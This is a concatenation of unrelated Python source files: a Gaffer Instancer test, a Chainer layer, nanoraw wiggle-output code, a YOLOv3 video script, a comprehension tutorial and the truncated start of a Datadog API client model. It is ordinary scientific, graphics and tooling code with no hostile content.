# With just one context var, driven by the same prim var as frame, with the same quantization,
# the variations don't multiply
del instancer["contextVariables"][1]
testAttributes( frameAttr = [ i + 1 for i in floatExpected ], floatAttr = floatExpected )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "frame" : 5, "" : 5 } )
# Using a different source primVar means the variations will multiply
instancer["timeOffset"]["name"].setValue( 'intVar' )
instancer["timeOffset"]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ i + 1 for i in range(100) ], floatAttr = floatExpected )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "frame" : 100, "" : 100 } )
instancer["timeOffset"]["quantize"].setValue( 20 )
testAttributes( frameAttr = [ ((i+10)//20)*20 + 1 for i in range(100) ], floatAttr = floatExpected )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "frame" : 6, "" : 30 } )
# Test with multiple point sources
pointsMerge = GafferScene.Parent()
pointsMerge["parent"].setValue( '/' )
pointSources = []
for j in range( 3 ):
points = IECoreScene.PointsPrimitive(
IECore.V3fVectorData(
[ imath.V3f( i, 0, 0 ) for i in range( 10 ) ]
)
)
points["floatVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData(
[ i * 0.1 + j for i in range( 10 ) ]
) )
pointSources.append( GafferScene.ObjectToScene() )
pointSources[-1]["name"].setValue( "points" )
pointSources[-1]["object"].setValue( points )
parent["children"][-1].setInput( pointSources[-1]["out"] )
instancer["in"].setInput( parent["out"] )
instancer["timeOffset"]["enabled"].setValue( False )
instancer["contextVariables"][0]["quantize"].setValue( 0 )
pointsFilter["paths"].setValue( IECore.StringVectorData( [ '/points*' ] ) )
self.assertAlmostEqual( instancer['out'].attributes( "points/instances/withAttrs/2/sphere" )["floatAttr"].value, 0.2 )
self.assertAlmostEqual( instancer['out'].attributes( "points1/instances/withAttrs/3/sphere" )["floatAttr"].value, 1.3 )
self.assertAlmostEqual( instancer['out'].attributes( "points2/instances/withAttrs/5/sphere" )["floatAttr"].value, 2.5 )
self.assertEqual( uniqueCounts(), { "floatVar" : 30, "" : 30 } )
instancer["contextVariables"][0]["quantize"].setValue( 0.2001 )
self.assertAlmostEqual( instancer['out'].attributes( "points/instances/withAttrs/2/sphere" )["floatAttr"].value, 0.2001, places = 6 )
self.assertAlmostEqual( instancer['out'].attributes( "points1/instances/withAttrs/3/sphere" )["floatAttr"].value, 1.2006, places = 6 )
self.assertAlmostEqual( instancer['out'].attributes( "points2/instances/withAttrs/5/sphere" )["floatAttr"].value, 2.4012, places = 6 )
self.assertEqual( uniqueCounts(), { "floatVar" : 15, "" : 15 } )
# Test invalid location
for func in [ instancer["out"].object, instancer["out"].childNames, instancer["out"].bound, instancer["out"].transform ]:
six.assertRaisesRegex( self,
Gaffer.ProcessException,
'Instancer.out.' + func.__name__ + ' : Instance id "777" is invalid, instancer produces only 10 children. Topology may have changed during shutter.',
func, "/points/instances/withAttrs/777"
)
# Test passthrough when disabled
instancer["enabled"].setValue( False )
self.assertScenesEqual( instancer["in"], instancer["out"] )
def testContextSet( self ):
baseSphere = GafferScene.Sphere()
childSphere = GafferScene.Sphere()
parent = GafferScene.Parent()
parent["in"].setInput( baseSphere["out"] )
parent["children"][0].setInput( childSphere["out"] )
parent["parent"].setValue( '/sphere' )
parent["expression"] = Gaffer.Expression()
# Note that we must supply a default for the value of "seed", since the setNames will be evaluated
# with no context set
parent["expression"].setExpression( 'parent["enabled"] = context.get( "seed", 0 ) % 2' )
allFilter = GafferScene.PathFilter()
allFilter["paths"].setValue( IECore.StringVectorData( [ '/...' ] ) )
setNode = GafferScene.Set()
setNode["in"].setInput( parent["out"] )
setNode["filter"].setInput( allFilter["out"] )
plane = GafferScene.Plane()
pathFilter = GafferScene.PathFilter()
pathFilter["paths"].setValue( IECore.StringVectorData( [ '/plane' ] ) )
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["filter"].setInput( pathFilter["out"] )
instancer["prototypes"].setInput( setNode["out"] )
instancer["rawSeed"].setValue( True )
with Gaffer.Context() as c :
c["seed"] = 0
self.assertEqual(
set( instancer["out"].set( "set" ).value.paths() ),
set( [ "/plane/instances/sphere/" + i for i in [ "0", "1", "2", "3" ] ] )
)
c["seed"] = 1
self.assertEqual(
set( instancer["out"].set( "set" ).value.paths() ),
set( [ "/plane/instances/sphere/" + i for i in
[ "0", "1", "2", "3", "0/sphere", "1/sphere", "2/sphere", "3/sphere" ] ]
)
)
instancer["seedEnabled"].setValue( True )
self.assertEqual(
set( instancer["out"].set( "set" ).value.paths() ),
set( [ "/plane/instances/sphere/" + i for i in [ "0", "1", "2", "3", "1/sphere", "3/sphere" ] ] )
)
# When encapsulating, we shouldn't pay any time cost for evaluating the set, even with a huge
# number of instances
plane["divisions"].setValue( imath.V2i( 1000 ) )
instancer["encapsulateInstanceGroups"].setValue( True )
t = time.time()
instancer["out"].set( "set" )
totalTime = time.time() - t
self.assertLess( totalTime, 0.001 )
# Test passthrough when disabled
instancer["enabled"].setValue( False )
self.assertScenesEqual( instancer["in"], instancer["out"] )
def runTestContextSetPerf( self, useContexts, parallelEvaluate ):
plane = GafferScene.Plane()
plane["divisions"].setValue( imath.V2i( 1000 ) )
plane["divisionExpression"] = Gaffer.Expression()
plane["divisionExpression"].setExpression( 'parent["divisions"] = imath.V2i( 1000 + int( context["collect:rootName"][-1:] ) )' )
# Duplicate the source points, so that we are measuring the perf of an Instancer targeting multiple locations
collectScenes = GafferScene.CollectScenes()
collectScenes["in"].setInput( plane["out"] )
collectScenes["rootNames"].setValue( IECore.StringVectorData( [ 'plane0', 'plane1', 'plane2', 'plane3', 'plane4' ] ) )
collectScenes["sourceRoot"].setValue( '/plane' )
# Source scene, with a little hierarchy, so paths aren't trivial to merge
sphere = GafferScene.Sphere()
group = GafferScene.Group( "group" )
group["in"][0].setInput( sphere["out"] )
# Create a set
leafFilter = GafferScene.PathFilter()
leafFilter["paths"].setValue( IECore.StringVectorData( [ '/group/sphere' ] ) )
setNode = GafferScene.Set()
setNode["in"].setInput( group["out"] )
setNode["filter"].setInput( leafFilter["out"] )
# Instancer
instancerFilter = GafferScene.PathFilter()
instancerFilter["paths"].setValue( IECore.StringVectorData( [ '/plane*' ] ) )
instancer = GafferScene.Instancer()
instancer["in"].setInput( collectScenes["out"] )
instancer["filter"].setInput( instancerFilter["out"] )
instancer["prototypes"].setInput( setNode["out"] )
instancer["seedEnabled"].setValue( useContexts )
if not parallelEvaluate:
with GafferTest.TestRunner.PerformanceScope() :
instancer["out"].set( "set" )
else:
# Set up a slightly realistic scene which results in the set plug being
# pulled multiple times in parallel, to check whether TaskCollaborate is working
setFilter = GafferScene.SetFilter()
setFilter["setExpression"].setValue( 'set' )
customAttributes = GafferScene.CustomAttributes()
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "", Gaffer.BoolPlug( "value", defaultValue = False, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic, ), True, "member1", Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ) )
customAttributes["in"].setInput( instancer["out"] )
customAttributes["filter"].setInput( setFilter["out"] )
customAttributes["attributes"]["member1"]["name"].setValue( 'testAttr' )
customAttributes["attributes"]["member1"]["value"].setValue( True )
subTree = GafferScene.SubTree()
subTree["in"].setInput( customAttributes["out"] )
subTree["root"].setValue( '/plane0/instances/group' )
isolateFilter = GafferScene.PathFilter()
isolateFilter["paths"].setValue( IECore.StringVectorData( [ '/67000*' ] ) )
isolate = GafferScene.Isolate()
isolate["in"].setInput( subTree["out"] )
isolate["filter"].setInput( isolateFilter["out"] )
with GafferTest.TestRunner.PerformanceScope() :
GafferSceneTest.traverseScene( isolate["out"] )
def testEmptyPrototypes( self ) :
plane = GafferScene.Plane()
planeFilter = GafferScene.PathFilter()
planeFilter["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["filter"].setInput( planeFilter["out"] )
self.assertEqual( instancer["variations"].getValue(), IECore.CompoundData( { "" : IECore.IntData( 0 ) } ) )
@unittest.skipIf( GafferTest.inCI(), "Performance not relevant on CI platform" )
@GafferTest.TestRunner.PerformanceTestMethod()
def testContextSetPerfNoVariationsSingleEvaluate( self ):
self.runTestContextSetPerf( False, False )
@unittest.skipIf( GafferTest.inCI(), "Performance not relevant on CI platform" )
@GafferTest.TestRunner.PerformanceTestMethod()
def testContextSetPerfNoVariationsParallelEvaluate( self ):
self.runTestContextSetPerf( False, True )
@unittest.skipIf( GafferTest.inCI(), "Performance not relevant on CI platform" )
@GafferTest.TestRunner.PerformanceTestMethod()
def testContextSetPerfWithVariationsSingleEvaluate( self ):
self.runTestContextSetPerf( True, False )
@unittest.skipIf( GafferTest.inCI(), "Performance not relevant on CI platform" )
@GafferTest.TestRunner.PerformanceTestMethod()
def testContextSetPerfWithVariationsParallelEvaluate( self ):
self.runTestContextSetPerf( True, True )
if __name__ == "__main__":
unittest.main()
|
py | 1a4bad056324d505f5854c0331d2f7272704f220 | """Module test for target-parquet functionality."""
# Reuse the tap connection rather than create a new target connection:
from samples.sample_target_parquet.parquet_target import SampleTargetParquet
from samples.sample_target_parquet.parquet_target_sink import SampleParquetTargetSink
__all__ = [
"SampleTargetParquet",
"SampleParquetTargetSink",
]
|
py | 1a4bad47898018cf071953680b208b38b31554ff | import chainer
class ParsevalAddition(chainer.function.Function):
"""Implementation of aggregation layer for Parseval networks.
Only two to one mapping is supported.
"""
def forward(self, inputs):
x0, x1, alpha = inputs
return x0 * alpha[0] + x1 * alpha[1],
def backward(self, inputs, grad_outputs):
x0, x1, alpha = inputs
gy = grad_outputs[0]
xp = chainer.cuda.get_array_module(gy)
ga = xp.array([(gy * x0).sum(), (gy * x1).sum()], xp.float32)
return gy * alpha[0], gy * alpha[1], ga
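# A minimal usage sketch (added for illustration; not part of the original module).
# Old-style chainer Functions are applied by instantiating the class and calling it
# on Variables; here `alpha` carries the two aggregation weights.
if __name__ == "__main__":
    import numpy as np
    x0 = chainer.Variable(np.random.randn(2, 3).astype(np.float32))
    x1 = chainer.Variable(np.random.randn(2, 3).astype(np.float32))
    alpha = chainer.Variable(np.array([0.6, 0.4], dtype=np.float32))
    y = ParsevalAddition()(x0, x1, alpha)
    print(y.data.shape)  # -> (2, 3)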
|
py | 1a4baeeaddcdbd983857e54377a6e76d237db12c | import sys, os
import numpy as np
from collections import defaultdict
import nanoraw_stats as ns
import nanoraw_helper as nh
VERBOSE = False
SMALLEST_PVAL=1e-15
WIG_HEADER='track type=wiggle_0 name="{0}_{1}_{2}{3}" ' + \
'description="{0} {1} {2}{4}"\n'
GROUP2_NAME='group2'
def write_wiggle(wig_base, group_text, data_values, type_name,
filter_zeros=False):
group_w_dot = '' if group_text == '' else '.' + group_text
group_w_us = '' if group_text == '' else '_' + group_text
group_w_space = '' if group_text == '' else ' ' + group_text
plus_wig_fp = open(
wig_base + '.' + type_name + group_w_dot + '.plus.wig', 'w')
minus_wig_fp = open(
wig_base + '.' + type_name + group_w_dot + '.minus.wig', 'w')
plus_wig_fp.write(WIG_HEADER.format(
wig_base, type_name, 'fwd_strand', group_w_us, group_w_space))
minus_wig_fp.write(WIG_HEADER.format(
wig_base, type_name, 'rev_strand', group_w_us, group_w_space))
for (chrm, strand), chrm_values in data_values.iteritems():
wig_fp = plus_wig_fp if strand == '+' else minus_wig_fp
wig_fp.write("variableStep chrom={} span=1\n".format(chrm))
wig_fp.write('\n'.join([
str(int(pos) + 1) + " " + str(round(val, 4))
for pos, val in enumerate(chrm_values)
if not (np.isnan(val) or (
filter_zeros and np.equal(val, 0.0)))]) + '\n')
plus_wig_fp.close()
minus_wig_fp.close()
return
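# Illustrative note (not part of the original source): for wig_base="sample",
# type_name="coverage" and group_text="", write_wiggle() produces
# "sample.coverage.plus.wig" and "sample.coverage.minus.wig", each beginning with a
# 'track type=wiggle_0 ...' header, followed by one "variableStep chrom=<chrm> span=1"
# section per chromosome and "<1-based position> <value>" data lines.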
def write_pvals_and_qvals_wig(
all_stats, wig_base, write_pvals, write_qvals):
if VERBOSE: sys.stderr.write('Parsing statistics.\n')
raw_chrm_strand_stats = defaultdict(list)
for (pval_f, qval_f, pval, qval, pos, chrm, strand,
cov1, cov2) in all_stats:
raw_chrm_strand_stats[(chrm, strand)].append((pos, pval, qval))
chrm_strand_pvals = {}
chrm_strand_qvals = {}
for chrm_strand, stats in raw_chrm_strand_stats.iteritems():
chrm_poss = zip(*stats)[0]
raw_chrm_pvals = zip(*stats)[1]
raw_chrm_qvals = zip(*stats)[2]
max_pos = max(chrm_poss)
# arrange and store p-values
chrm_pvals = np.empty(max_pos + 1)
chrm_pvals[:] = np.nan
np.put(chrm_pvals, chrm_poss, raw_chrm_pvals)
chrm_strand_pvals[chrm_strand] = -np.log10(np.maximum(
SMALLEST_PVAL, chrm_pvals))
# arrange and store q-values
chrm_qvals = np.empty(max_pos + 1)
chrm_qvals[:] = np.nan
np.put(chrm_qvals, chrm_poss, raw_chrm_qvals)
chrm_strand_qvals[chrm_strand] = -np.log10(np.maximum(
SMALLEST_PVAL, chrm_qvals))
if VERBOSE: sys.stderr.write('Writing statistics wig(s).\n')
if write_pvals:
write_wiggle(wig_base, '', chrm_strand_pvals, 'neg_log10_pvals')
if write_qvals:
write_wiggle(wig_base, '', chrm_strand_qvals, 'neg_log10_qvals')
return
def get_chrm_sizes(raw_read_coverage, raw_read_coverage2=None):
strand_chrm_sizes = defaultdict(list)
for (chrm, strand), cs_read_cov in \
raw_read_coverage.iteritems():
strand_chrm_sizes[chrm].append(max(
r_data.end for r_data in cs_read_cov))
if raw_read_coverage2 is not None:
for (chrm, strand), cs_read_cov in \
raw_read_coverage2.iteritems():
strand_chrm_sizes[chrm].append(max(
r_data.end for r_data in cs_read_cov))
return dict(
(chrm, max(strnd_sizes))
for chrm, strnd_sizes in
strand_chrm_sizes.iteritems())
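# Illustrative note (not part of the original source): get_chrm_sizes() collapses the
# per-strand maxima into a single size per chromosome, e.g. coverage ending at 1200 on
# ('chr1', '+') and at 980 on ('chr1', '-') yields {'chr1': 1200}.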
def write_length_wig(
raw_read_coverage, chrm_sizes, wig_base, group_name):
if VERBOSE: sys.stderr.write('Parsing events lengths.\n')
base_lens = nh.get_base_lengths(raw_read_coverage, chrm_sizes)
if VERBOSE: sys.stderr.write('Writing length wig.\n')
write_wiggle(wig_base, group_name, base_lens, 'length')
return
def write_signal_sd_wig(
raw_read_coverage, chrm_sizes, wig_base, group_name):
if VERBOSE: sys.stderr.write('Parsing signal SDs.\n')
base_sds = nh.get_base_sds(raw_read_coverage, chrm_sizes)
if VERBOSE: sys.stderr.write('Writing signal SD wig.\n')
write_wiggle(wig_base, group_name, base_sds, 'signalSd')
return
def write_signal_and_diff_wigs(
raw_read_coverage1, raw_read_coverage2, chrm_sizes,
wig_base, group1_name, write_sig, write_diff):
if VERBOSE: sys.stderr.write('Parsing mean base signals.\n')
base_means1 = nh.get_base_means(raw_read_coverage1, chrm_sizes)
if raw_read_coverage2 is not None:
base_means2 = nh.get_base_means(raw_read_coverage2, chrm_sizes)
if write_diff:
if VERBOSE: sys.stderr.write(
'Calculating signal differences.\n')
sig_diffs = {}
for chrm, strand in [(c, s) for c in chrm_sizes.keys()
for s in ('+', '-')]:
# calculate difference and set no coverage
# (nan) values to zero
sig_diffs[(chrm, strand)] \
= base_means1[(chrm, strand)] - \
base_means2[(chrm, strand)]
            if VERBOSE: sys.stderr.write('Writing difference wig.\n')
write_wiggle(wig_base, '', sig_diffs, 'difference')
if write_sig:
if VERBOSE: sys.stderr.write('Writing signal wigs.\n')
write_wiggle(wig_base, GROUP2_NAME, base_means2, 'signal')
if write_sig:
write_wiggle(wig_base, group1_name, base_means1, 'signal')
return
def write_cov_wig(raw_read_coverage, wig_base, group_text):
read_coverage = nh.get_coverage(raw_read_coverage)
if VERBOSE: sys.stderr.write('Writing coverage wig.\n')
write_wiggle(wig_base, group_text, read_coverage, 'coverage', True)
return
def write_all_wiggles(
files1, files2, corrected_group, basecall_subgroups, obs_filter,
test_type, min_test_vals, stats_fn, fishers_method_offset,
wig_base, wig_types):
stats_file_exists = stats_fn is not None and os.path.isfile(stats_fn)
include_stats = 'pvals' in wig_types or 'qvals' in wig_types
if include_stats and stats_file_exists:
if VERBOSE: sys.stderr.write('Loading statistics from file.\n')
all_stats = ns.parse_stats(stats_fn)
if VERBOSE: sys.stderr.write('Parsing FAST5 files.\n')
raw_read_coverage1 = nh.parse_fast5s(
files1, corrected_group, basecall_subgroups)
raw_read_coverage1 = nh.filter_reads(raw_read_coverage1, obs_filter)
group1_name = '' if files2 is None else 'group1'
if files2 is not None:
raw_read_coverage2 = nh.parse_fast5s(
files2, corrected_group, basecall_subgroups)
raw_read_coverage2 = nh.filter_reads(
raw_read_coverage2, obs_filter)
chrm_sizes = get_chrm_sizes(
raw_read_coverage1, raw_read_coverage2)
if include_stats and not stats_file_exists:
if VERBOSE: sys.stderr.write('Calculating statistics.\n')
all_stats = ns.get_all_significance(
raw_read_coverage1, raw_read_coverage2, test_type,
min_test_vals, stats_fn, fishers_method_offset)
if VERBOSE: sys.stderr.write('Writing wiggles.\n')
if 'coverage' in wig_types:
write_cov_wig(raw_read_coverage2, wig_base, GROUP2_NAME)
if 'signal_sd' in wig_types:
write_signal_sd_wig(
raw_read_coverage2, chrm_sizes, wig_base, GROUP2_NAME)
if 'length' in wig_types:
write_length_wig(raw_read_coverage2, chrm_sizes,
wig_base, GROUP2_NAME)
# signal and difference wigs must be written in a single call, either with
# or without a second set of files (unlike coverage, SDs and lengths,
# which are written separately for each group)
if 'signal' in wig_types or 'difference' in wig_types:
write_signal_and_diff_wigs(
raw_read_coverage1, raw_read_coverage2, chrm_sizes,
wig_base, group1_name, 'signal' in wig_types,
'difference' in wig_types)
else:
chrm_sizes = get_chrm_sizes(raw_read_coverage1)
if VERBOSE: sys.stderr.write('Writing wiggles.\n')
if 'signal' in wig_types:
write_signal_and_diff_wigs(
raw_read_coverage1, None, chrm_sizes, wig_base,
group1_name, 'signal' in wig_types, False)
if 'coverage' in wig_types:
write_cov_wig(raw_read_coverage1, wig_base, group1_name)
if 'signal_sd' in wig_types:
write_signal_sd_wig(raw_read_coverage1, chrm_sizes,
wig_base, group1_name)
if 'length' in wig_types:
write_length_wig(raw_read_coverage1, chrm_sizes,
wig_base, group1_name)
if 'pvals' in wig_types or 'qvals' in wig_types:
write_pvals_and_qvals_wig(
all_stats, wig_base, 'pvals' in wig_types,
'qvals' in wig_types)
return
def write_most_signif(
files1, files2, num_regions, qval_thresh, corrected_group,
basecall_subgroups, seqs_fn, num_bases, test_type, obs_filter,
min_test_vals, stats_fn, fasta_fn, fishers_method_offset):
calc_stats = stats_fn is None or not os.path.isfile(stats_fn)
if not calc_stats:
if VERBOSE: sys.stderr.write('Loading statistics from file.\n')
all_stats = ns.parse_stats(stats_fn)
if calc_stats or fasta_fn is None:
if VERBOSE: sys.stderr.write('Parsing files.\n')
raw_read_coverage1 = nh.parse_fast5s(
files1, corrected_group, basecall_subgroups)
raw_read_coverage2 = nh.parse_fast5s(
files2, corrected_group, basecall_subgroups)
raw_read_coverage1 = nh.filter_reads(
raw_read_coverage1, obs_filter)
raw_read_coverage2 = nh.filter_reads(
raw_read_coverage2, obs_filter)
if calc_stats:
if VERBOSE: sys.stderr.write('Calculating statistics.\n')
all_stats = ns.get_all_significance(
raw_read_coverage1, raw_read_coverage2, test_type,
min_test_vals, stats_fn, fishers_method_offset)
plot_intervals = ns.get_most_signif_regions(
all_stats, num_bases, num_regions, qval_thresh)
if fasta_fn is None:
reg_seqs = get_region_sequences(
plot_intervals, raw_read_coverage1, raw_read_coverage2,
num_bases, corrected_group)
else:
fasta_records = nh.parse_fasta(fasta_fn)
reg_seqs = [
(p_int, fasta_records[chrm][start:start+num_bases])
for p_int, (chrm, start, strand, reg_name)
in plot_intervals if chrm in fasta_records]
# get reads overlapping each region
if VERBOSE: sys.stderr.write('Outputting region sequences.\n')
with open(seqs_fn, 'w') as seqs_fp:
for reg_i, reg_seq in reg_seqs:
chrm, start, strand, stat = next(
p_int for p_reg_i, p_int in plot_intervals
if p_reg_i == reg_i)
if strand == '-':
reg_seq = nh.rev_comp(reg_seq)
seqs_fp.write('>{0}::{1:d}::{2} {3}\n{4}\n'.format(
chrm, start, strand, stat, ''.join(reg_seq)))
return
def wiggle_main(args):
global VERBOSE
VERBOSE = not args.quiet
nh.VERBOSE = VERBOSE
ns.VERBOSE = VERBOSE
if (any(data_type in args.wiggle_types
for data_type in ['pvals', 'qvals']) and
args.fast5_basedirs2 is None and
args.statistics_filename is None):
sys.stderr.write(
'*' * 60 + '\nERROR: Must provide either two sets of ' +
'FAST5s or a statistics filename to output ' +
'pvals and/or qvals wiggle files.\n' + '*' * 60 + '\n')
sys.exit()
if ('difference' in args.wiggle_types and
args.fast5_basedirs2 is None):
sys.stderr.write(
'*' * 60 + '\nERROR: Must provide two sets of FAST5s ' + \
'to output difference wiggle files.\n' + '*' * 60 + '\n')
sys.exit()
files1, files2 = nh.get_files_lists(
args.fast5_basedirs, args.fast5_basedirs2)
write_all_wiggles(
files1, files2, args.corrected_group, args.basecall_subgroups,
nh.parse_obs_filter(args.obs_per_base_filter),
args.test_type, args.minimum_test_reads,
args.statistics_filename, args.fishers_method_offset,
args.wiggle_basename, args.wiggle_types)
return
def write_signif_diff_main(args):
global VERBOSE
VERBOSE = not args.quiet
nh.VERBOSE = VERBOSE
ns.VERBOSE = VERBOSE
files1, files2 = nh.get_files_lists(
args.fast5_basedirs, args.fast5_basedirs2)
write_most_signif(
files1, files2, args.num_regions, args.q_value_threshold,
args.corrected_group, args.basecall_subgroups,
args.sequences_filename, args.num_bases, args.test_type,
nh.parse_obs_filter(args.obs_per_base_filter),
args.minimum_test_reads, args.statistics_filename,
args.genome_fasta, args.fishers_method_offset)
return
if __name__ == '__main__':
raise NotImplementedError(
'This is a module. See commands with `nanoraw -h`')
|
py | 1a4baf536d705b9c814847cb7a708a0e63d5b976 | |
py | 1a4bafaf56136b03e7d2f8f85eb5fd074ba7749d | from sef_dr.linear import LinearSEF
import numpy as np
from sklearn.neighbors import NearestCentroid
def test_linear_sef():
"""
Performs some basic testing using the LinearSEF
:return:
"""
np.random.seed(1)
train_data = np.random.randn(100, 50)
train_labels = np.random.randint(0, 2, 100)
proj = LinearSEF(50, output_dimensionality=12)
proj._initialize(train_data)
proj_data = proj.transform(train_data, batch_size=8)
assert proj_data.shape[0] == 100
assert proj_data.shape[1] == 12
ncc = NearestCentroid()
ncc.fit(proj_data, train_labels)
acc_before = ncc.score(proj_data, train_labels)
loss = proj.fit(data=train_data, target_labels=train_labels, epochs=200,
target='supervised', batch_size=8, regularizer_weight=0, learning_rate=0.0001, verbose=False)
# Ensure that loss is reducing
assert loss[0] > loss[-1]
proj_data = proj.transform(train_data, batch_size=8)
assert proj_data.shape[0] == 100
assert proj_data.shape[1] == 12
ncc = NearestCentroid()
ncc.fit(proj_data, train_labels)
acc_after = ncc.score(proj_data, train_labels)
assert acc_after > acc_before |
py | 1a4bb0ef7aee095592b438e3e95c920da9062f8d | import time
from absl import app, flags, logging
from absl.flags import FLAGS
import cv2
import tensorflow as tf
from yolov3_tf2.models import (
YoloV3, YoloV3Tiny
)
from yolov3_tf2.dataset import transform_images
from yolov3_tf2.utils import draw_outputs
flags.DEFINE_string('classes', './data/coco.names', 'path to classes file')
flags.DEFINE_string('weights', './checkpoints/yolov3.tf',
'path to weights file')
flags.DEFINE_boolean('tiny', False, 'yolov3 or yolov3-tiny')
flags.DEFINE_integer('size', 416, 'resize images to')
flags.DEFINE_string('video', './data/video.mp4',
'path to video file or number for webcam')
flags.DEFINE_string('output', None, 'path to output video')
flags.DEFINE_string('output_format', 'XVID', 'codec used in VideoWriter when saving video to file')
flags.DEFINE_integer('num_classes', 2, 'number of classes in the model')
def main(_argv):
physical_devices = tf.config.experimental.list_physical_devices('GPU')
for physical_device in physical_devices:
tf.config.experimental.set_memory_growth(physical_device, True)
if FLAGS.tiny:
yolo = YoloV3Tiny(classes=FLAGS.num_classes)
else:
yolo = YoloV3(classes=FLAGS.num_classes)
yolo.load_weights(FLAGS.weights)
logging.info('weights loaded')
class_names = [c.strip() for c in open(FLAGS.classes).readlines()]
logging.info('classes loaded')
times = []
try:
vid = cv2.VideoCapture(int(FLAGS.video))
except:
vid = cv2.VideoCapture(FLAGS.video)
out = None
if FLAGS.output:
# by default VideoCapture returns float instead of int
width = int(vid.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(vid.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = int(vid.get(cv2.CAP_PROP_FPS))
codec = cv2.VideoWriter_fourcc(*FLAGS.output_format)
out = cv2.VideoWriter(FLAGS.output, codec, fps, (width, height))
while True:
_, img = vid.read()
if img is None:
logging.warning("Empty Frame")
time.sleep(0.1)
break
img_in = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img_in = tf.expand_dims(img_in, 0)
img_in = transform_images(img_in, FLAGS.size)
t1 = time.time()
boxes, scores, classes, nums = yolo.predict(img_in)
t2 = time.time()
times.append(t2-t1)
times = times[-20:]
img = draw_outputs(img, (boxes, scores, classes, nums), class_names)
img = cv2.putText(img, "Time: {:.2f}ms".format(sum(times)/len(times)*1000), (0, 30),
cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
if FLAGS.output:
out.write(img)
cv2.imshow('output', img)
if cv2.waitKey(1) == ord('q'):
break
cv2.destroyAllWindows()
if __name__ == '__main__':
try:
app.run(main)
except SystemExit:
pass
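# Example invocations (hedged: the script file name detect_video.py and the
# paths below are placeholders, not taken from this repository):
#
#   python detect_video.py --video ./data/video.mp4 --weights ./checkpoints/yolov3.tf
#   python detect_video.py --video 0 --output ./out.avi   # webcam index passed as "video"
#
# Press "q" in the preview window to stop early.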
|
py | 1a4bb12164c5f5affa547f994822c95ecf7f8412 | import collections
import uuid
Measurement = collections.namedtuple('Measurement', 'id x y value')
measurements = [
Measurement(str(uuid.uuid4()), 1, 1, 72),
Measurement(str(uuid.uuid4()), 2, 1, 40),
Measurement(str(uuid.uuid4()), 3, 1, 11),
Measurement(str(uuid.uuid4()), 2, 1, 90),
Measurement(str(uuid.uuid4()), 2, 2, 60),
Measurement(str(uuid.uuid4()), 2, 3, 73),
Measurement(str(uuid.uuid4()), 3, 1, 40),
Measurement(str(uuid.uuid4()), 3, 2, 90),
Measurement(str(uuid.uuid4()), 3, 3, 90)
]
# c-style (loops)
high_measurements1 = []
count = len(measurements)
index = 0
while index < count:
m = measurements[index]
if m.value >= 70:
high_measurements1.append(m)
index += 1
print(high_measurements1)
# in python it should look like this, but it's still loop...
high_measurements_1 = []
for m in measurements:
if m.value >= 70:
high_measurements_1.append(m.value)
print(high_measurements_1)
# list of high values via comprehension
high_measurements2 = [
m.value
for m in measurements
if m.value >= 70
]
print(high_measurements2)
# via generator expression
high_m_gen = (
m.value
for m in measurements
if m.value >= 70
)
print(high_m_gen)
high_measurements3 = list(high_m_gen) # process the generator to get something printable
print(high_measurements3)
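# note that a generator can be consumed only once: after the list() call above,
# iterating high_m_gen again (e.g. another list(high_m_gen)) yields an empty list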
# high value dict via comprehension
high_m_by_id = {
m.id: m
for m in measurements
if m.value >= 70
}
print(high_m_by_id)
# high value distinct via set
high_values_distinct = {
m.value
for m in measurements
if m.value >= 70
}
print(high_values_distinct) |
py | 1a4bb15665868e4e971653e804b4788698e4589a | import json
with open("data/story.json", "r") as story_file:
story = json.load(story_file)
messages, defaults, zones = story.values()
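# note: this unpacking assumes story.json has exactly three top-level keys
# (messages, defaults, zones) in that order; json.load preserves the file's key
# order and dicts keep insertion order on Python 3.7+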
# for zone in zones:
# rooms = zones[zone]
# for room in rooms:
# # room is currently the key of the room obj
# features = rooms[room]["features"]
# items = rooms[room]["items"]
# print(f"{room}: ->")
# print(f" feats-")
# for feature in features:
# print(" " + feature)
# print(f" items-")
# for item in items:
# print(" " + item) |
py | 1a4bb178a7335dd67d0bcf1cdde6d3b5a3463bd8 | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
import re # noqa: F401
import sys # noqa: F401
from datadog_api_client.v1.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from datadog_api_client.v1.model.log_stream_widget_definition import LogStreamWidgetDefinition
from datadog_api_client.v1.model.notebook_cell_time import NotebookCellTime
from datadog_api_client.v1.model.notebook_distribution_cell_attributes import NotebookDistributionCellAttributes
from datadog_api_client.v1.model.notebook_graph_size import NotebookGraphSize
from datadog_api_client.v1.model.notebook_heat_map_cell_attributes import NotebookHeatMapCellAttributes
from datadog_api_client.v1.model.notebook_log_stream_cell_attributes import NotebookLogStreamCellAttributes
from datadog_api_client.v1.model.notebook_markdown_cell_attributes import NotebookMarkdownCellAttributes
from datadog_api_client.v1.model.notebook_split_by import NotebookSplitBy
from datadog_api_client.v1.model.notebook_timeseries_cell_attributes import NotebookTimeseriesCellAttributes
from datadog_api_client.v1.model.notebook_toplist_cell_attributes import NotebookToplistCellAttributes
globals()["LogStreamWidgetDefinition"] = LogStreamWidgetDefinition
globals()["NotebookCellTime"] = NotebookCellTime
globals()["NotebookDistributionCellAttributes"] = NotebookDistributionCellAttributes
globals()["NotebookGraphSize"] = NotebookGraphSize
globals()["NotebookHeatMapCellAttributes"] = NotebookHeatMapCellAttributes
